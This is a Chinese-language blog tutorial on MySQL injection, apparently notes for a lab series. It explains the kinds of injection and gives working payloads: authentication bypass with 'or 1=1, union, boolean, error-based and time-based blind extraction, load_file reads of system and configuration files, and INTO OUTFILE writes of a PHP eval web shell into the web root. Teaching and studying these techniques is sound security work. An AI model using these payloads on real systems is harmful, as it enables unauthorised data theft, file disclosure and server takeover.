sql

「第一部分/page-1 Basic Challenges」

 

Background-1 基础知识

此处介绍一些 mysql 注入的一些基础知识。

(1)注入的分类---仁者见仁,智者见智

下面这个是阿德玛表哥的一段话,个人认为分类已经是够全面了。理解不了跳过,当你完全看完整个学习过程后再回头看这段。能完全理解下面的这些每个分类,对每个分类有属于你的认知和了解的时候,你就算是小有成就了,当然仅仅是 sql 注入上。

 

基于从服务器接收到的响应

▲基于错误的 SQL 注入

▲联合查询的类型

▲堆查询注射

▲SQL 盲注

   •基于布尔 SQL 盲注

   •基于时间的 SQL 盲注

   •基于报错的 SQL 盲注

 

基于如何处理输入的 SQL 查询(数据类型)

    •基于字符串

    •数字或整数为基础的

 

 基于程度和顺序的注入(哪里发生了影响)

  ★一阶注射

  ★二阶注射

      一阶注射是指输入的注射语句对 WEB 直接产生了影响,出现了结果;二阶注入类似存储型 XSS,是指输入提交的语句,无法直接对 WEB 应用程序产生影响,通过其它的辅助间接的对 WEB 产生危害,这样的就被称为是二阶注入.

基于注入点的位置上的

 ▲通过用户输入的表单域的注射。

 ▲通过 cookie 注射。

 ▲通过服务器变量注射。(基于头部信息的注射)

 

(2)系统函数介绍

几个常用函数:

 1. version()——MySQL 版本

 2. user()——数据库用户名

 3. database()——数据库名

 4. @@datadir——数据库路径

 5.@@version_compile_os——操作系统版本

 

(3)字符串连接函数

 函数具体介绍  http://www.cnblogs.com/lcamry/p/5715634.html

 1. concat(str1,str2,...)——没有分隔符地连接字符串

 2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串

 group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据说着比较抽象,其实也并不需要详细了解,知道这三个函数能一次性查出所有信息就行了。

 

 (4)一般用于尝试的语句

 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为

   %23 or 1=1--+

    'or 1=1--+ 

    "or 1=1--+ 

     )or 1=1--+ 

  '  )or 1=1--+

  ") or 1=1--+

  "))or 1=1--+

   一般的代码为:

                 $id=$_GET['id'];

                 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

此处考虑两个点,一个是闭合前面你的 ‘ 另一个是处理后面的 ‘ ,一般采用两种思路,闭合后面的引号或者注释掉,注释掉采用--+ 或者 #(%23)

 

(5)union 操作符的介绍

UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。

 SQL UNION 语法

   SELECT column_name(s) FROM table_name1

   UNION

   SELECT column_name(s) FROM table_name2

   注释:默认地,UNION 操作符选取不同的值。如果允许重复的值,请使用 UNION ALL。

 SQL UNION ALL 语法

   SELECT column_name(s) FROM table_name1

   UNION ALL

   SELECT column_name(s) FROM table_name2

 另外,UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名。

 

(6)sql 中的逻辑运算

这里我想说下逻辑运算的问题。

 提出一个问题 Select * from users where id=1 and 1=1; 这条语句为什么能够选择出 id=1的内容,and 1=1 到底起作用了没有?这里就要清楚 sql 语句执行顺序了。同时这个问题我们在使用万能密码的时候会用到。

 

 Select * from admin where username=’admin’ and password=’admin’

 

我们可以用 ’or 1=1# 作为密码输入。原因是为什么?

这里涉及到一个逻辑运算,当使用上述所谓的万能密码后,构成的 sql 语句为:

 

Select * from admin where username=’admin’ and password=’’or 1=1#’

 

Explain:上面的这个语句执行后,我们在不知道密码的情况下就登录到了 admin 用户了。原因是在 where 子句后,我们可以看到三个条件语句 username=’admin’ and password=’’or 1=1。三个条件用 and 和 or 进行连接。

 

在 sql 中,我们 and 的运算优先级大于 or 的元算优先级。因此可以看到 第一个条件(用 a 表示)是真的,第二个条件(用 b 表示)是假的,a and b = false,第一个条件和第二个条件执行 and 后是假,再与第三个条件 or 运算,因为第三个条件 1=1 是恒成立的,所以结果自然就为真了。因此上述的语句就是恒真了。

 

 

 

①Select * from users where id=1 and 1=1;

 ②Select * from users where id=1 && 1=1;

 ③Select * from users where id=1 & 1=1;

 

 上述三者有什么区别?①和②是一样的,表达的意思是 id=1 条件和 1=1 条件进行与运算。

 

③的意思是 id=1 条件与 1 进行&位操作,id=1 被当作 true,与 1 进行 & 运算 结果还是 1,再进行=操作,1=1,还是 1(ps:&的优先级大于=)Ps:此处进行的位运算。我们可以将数转换为二进制再进行与、或、非、异或等运算。必要的时候可以利用该方法进行注入结果。例如将某一字符转换为 ascii 码后,可以分别与1,2,4,8,16,32.。。。进行与运算,可以得到每一位的值,拼接起来就是 ascii 码值。再从 ascii 值反推回字符。(运用较少)

 

(7)注入流程

 

我们的数据库存储的数据按照上图的形式,一个数据库当中有很多的数据表,数据表当中有很多的列,每一列当中存储着数据。我们注入的过程就是先拿到数据库名,在获取到当前数据库名下的数据表,再获取当前数据表下的列,最后获取数据。

 

Background-2 盲注的讲解

 

何为盲注?盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显到前端页面。

 

此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类

   •基于布尔 SQL 盲注

 

   •基于时间的 SQL 盲注

 

   •基于报错的 SQL 盲注

 

Ps:知识点太多了,这里只能简单列出来大致讲解一下。(ps:每当看到前辈的奇淫技巧的 payload 时,能想象到我内心的喜悦么?我真的想细细的写写这一块,但是不知道该怎么写或者小伙伴需要怎么样来讲这个,可以 m 我。)

 

1:基于布尔 SQL 盲注----------构造逻辑判断

 

我们可以利用逻辑判断进行截取字符串相关函数解析http://www.cnblogs.com/lcamry/p/5504374.html

(这个还是要看下)

 

  ▲left(database(),1)>’s’ //left()函数

 

Explain:database()显示数据库名称,left(a,b)从左侧截取 a 的前 b 位

 

  ▲ascii(substr((select table_name information_schema.tables where tables_schema =database()limit 0,1),1,1))=101 --+ //substr()函数,ascii()函数

 

Explain:substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。Ascii()将某个字符转换为 ascii 值

 

▲ascii(substr((select database()),1,1))=98

 

▲ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23 //ORD()函数,MID()函数

 

Explain:mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位

 

Ord()函数同 ascii(),将字符转为 ascii 值

 

▲regexp 正则注入

 

正则注入介绍:http://www.cnblogs.com/lcamry/articles/5717442.html

 

用法介绍:select user() regexp '^[a-z]';

 

Explain:正则表达式的用法,user()结果为 root,regexp 为匹配 root 的正则表达式。

 

第二位可以用 select user() regexp '^ro'来进行

 

 

 

当正确的时候显示结果为 1,不正确的时候显示结果为 0.

示例介绍:

 

I select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));

 

IIselect * from users where id=1 and 1=(user() regexp'^ri');

 

通过 if 语句的条件判断,返回一些条件句,比如 if 等构造一个判断。根据返回结果是否等于 0 或者 1 进行判断。

 

IIIselect * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);

 

这里利用 select 构造了一个判断语句。我们只需要更换 regexp 表达式即可

 

'^u[a-z]' -> '^us[a-z]' -> '^use[a-z]' -> '^user[a-z]' -> FALSE

 

如何知道匹配结束了?

 

这里大部分根据一般的命名方式(经验)就可以判断。但是如何你在无法判断的情况下,可以用 table_name regexp '^username$'来进行判断。

 

 ^是从开头进行匹配,$是从结尾开始判断。更多的语法可以参考 mysql 使用手册进行了解。

 

好,这里思考一个问题?

 

table_name 有好几个,我们只得到了一个 user,如何知道其他的?

 

这里可能会有人认为使用 limit 0,1 改为 limit 1,1。

 

但是这种做法是错误的,limit 作用在前面的 select 语句中,而不是 regexp。那我们该如何选择。其实在 regexp 中我们是取匹配 table_name 中的内容,只要 table_name 中有的内容,我们用 regexp 都能够匹配到。

 

因此上述语句不仅仅可以选择 user,还可以匹配其他项。

 

  ▲like 匹配注入

 

和上述的正则类似,mysql 在匹配的时候我们可以用 like 进行匹配。

 

用法:select user() like ‘ro%’

 

 

 

2:基于报错的 SQL 盲注------构造 payload 让信息通过错误提示回显出来

 

▲Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;

 

//explain:此处有三个点,一是需要 concat 计数,二是 floor,取得 0 or 1,进行数据的重复,三是 group by 进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。也有解释为 mysql 的 bug 的问题。

但是此处需要将 rand(0),rand()需要多试几次才行。

 

以上语句可以简化成如下的形式。

 

select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))

 

如果关键的表被禁用了,可以使用这种形式 select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))

 

如果 rand 被禁用了可以使用用户变量来报错

 

select min(@a:=1) from information_schema.tables group by concat(passwo

 

rd,@a:=(@a+1)%2)

 

▲select exp(~(select * FROM(SELECT USER())a)) //double 数值类型超出范围

 

//Exp()为以 e 为底的对数函数;版本在 5.5.5 及其以上

 

可以参考 exp 报错文章:http://www.cnblogs.com/lcamry/articles/5509124.html

 

▲select !(select * from (select user())x) -(ps:这是减号)~0

 

//bigint 超出范围;~0 是对 0 逐位取反,很大的版本在 5.5.5 及其以上

 

可以参考文章 bigint 溢出文章http://www.cnblogs.com/lcamry/articles/5509112.html

 

▲extractvalue(1,concat(0x7e,(select @@version),0x7e))

se//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误 

 

▲updatexml(1,concat(0x7e,(select @@version),0x7e),1)

//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误

 

▲select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

//mysql 重复特性,此处重复了 version,所以报错。   

 

3:基于时间的 SQL 盲注----------延时注入

 

▲If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句,条件为假,执行 sleep

 

Ps:遇到以下这种利用 sleep()延时注入语句 select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8, 9,.'));

 

该语句意思是在 0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。

 

 ▲UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;

 

//BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的 cpu 资源。推荐使用 sleep()函数进行注入。

 

 

Background-3  导入导出相关操作的讲解

 

1、load_file()导出文件

 

Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。

 

使用条件:

A、必须有权限读取并且文件必须完全可读

 and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。 and (select count(*) from mysql.user)>0/* 返回错误,应该是管理员给数据库帐户降权

B、欲读取文件必须在服务器上

C、必须指定文件完整的路径

D、欲读取文件必须小于 max_allowed_packet

 

如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。

 

比较难满足的就是权限,在 windows 下,如果 NTFS 设置得当,是不能读取相关的文件的,当遇到只有administrators 才能访问的文件,users 就别想 load_file 出来。

 

在实际的注入中,我们有两个难点需要解决:绝对物理路径构造有效的畸形语句(报错爆出绝对路径)

 

在很多 PHP 程序中,当提交一个错误的 Query,如果 display_errors = on,程序就会暴露 WEB 目录的绝对路径,只要知道路径,那么对于一个可以注入的 PHP 程序来说,整个服务器的安全将受到严重的威胁。

 

常用路径:

 

http://www.cnblogs.com/lcamry/p/5729087.html

 

示例:Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92, 114,101,112,97,105,114,92,115,97,109)))

 

利用 hex()将文件内容导出来,尤其是 smb 文件时可以使用。

 

-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) Explain:“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的 ASCII 代码

 

-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)Explain:“c:/boot.ini”的 16 进制是“0x633a2f626f6f742e696e69”

 

-1 union select 1,1,1,load_file(c:\\boot.ini) Explain:路径里的/用 \\代替

 

2、文件导入到数据库

 

LOAD DATA INFILE 语句用于高速地从一个文本文件中读取行,并装入一个表中。文件名称必须为一个文字字符串。

 

 

 

在注入过程中,我们往往需要一些特殊的文件,比如配置文件,密码文件等。当你具有数据库的权限时,可以将系统文件利用 load data infile 导入到数据库中

 

函数具体介绍:对于参数介绍这里就不过多的赘述了,可以参考 mysql 的文档。(提醒:参考文档才是最佳的学习资料)

 

示例:load data infile '/tmp/t0.txt' ignore into table t0 character set gbk fields terminated by '\t' lines terminated by '\n'

 

 

 

将/tmp/t0.txt 导入到 t0 表中,character set gbk 是字符集设置为 gbk,fields terminated by 是每一项数据之间的分隔符,lines terminated by 是行的结尾符。

 

当错误代码是 2 的时候的时候,文件不存在,错误代码为 13 的时候是没有权限,可以考虑 /tmp 等文件夹。

 

TIPS:我们从 mysql5.7 的文档看到添加了 load xml 函数,是否依旧能够用来做注入还需要验证。

 

3、导入到文件

 

SELECT.....INTO OUTFILE 'file_name'

 

可以把被选择的行写入一个文件中。该文件被创建到服务器主机上,因此您必须拥有 FILE 权限,才能使用此语法。file_name 不能是一个已经存在的文件。

 

我们一般有两种利用形式:

 

第一种直接将 select 内容导入到文件中:

Select version() into outfile “c:\\phpnow\\htdocs\\test.php”

 

此处将 version()替换成一句话,<?php @eval($_post[“mima”])?>也即

 

Select  <?php @eval($_post[“mima”])?>  into outfile “c:\\phpnow\\htdocs\\test.php”

 

直接连接一句话就可以了,其实在 select 内容中不仅仅是可以上传一句话的,也可以上传很多的内容。

 

第二种修改文件结尾:

 

Select version() Into outfile “c:\\phpnow\\htdocs\\test.php” LINES TERMINATED BY 0x16 进制文件

 

解释:通常是用‘\r\n’结尾,此处我们修改为自己想要的任何文件。同时可以用 FIELDS TERMINATED BY

 

16 进制可以为一句话或者其他任何的代码,可自行构造。在 sqlmap 中 os-shell 采取的就是这样的方式,具体可参考 os-shell 分析文章:

 

http://www.cnblogs.com/lcamry/p/5505110.html

 

TIPS:

 

(1)可能在文件路径当中要注意转义,这个要看具体的环境

 

(2)上述我们提到了 load_file(),但是当前台无法导出数据的时候,我们可以利用下面的语句:

 

select load_file(‘c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini’)into outfile ‘c:\\wamp\\www\\test.php’

 

可以利用该语句将服务器当中的内容导入到 web 服务器下的目录,这样就可以得到数据了。

 

上述 my.ini 当中存在 password 项(不过默认被注释),当然会有很多的内容可以被导出来,这个要平时积累。

posted @ 2018-09-10 09:50  喋云怡雪  阅读(179)  评论(0编辑  收藏  举报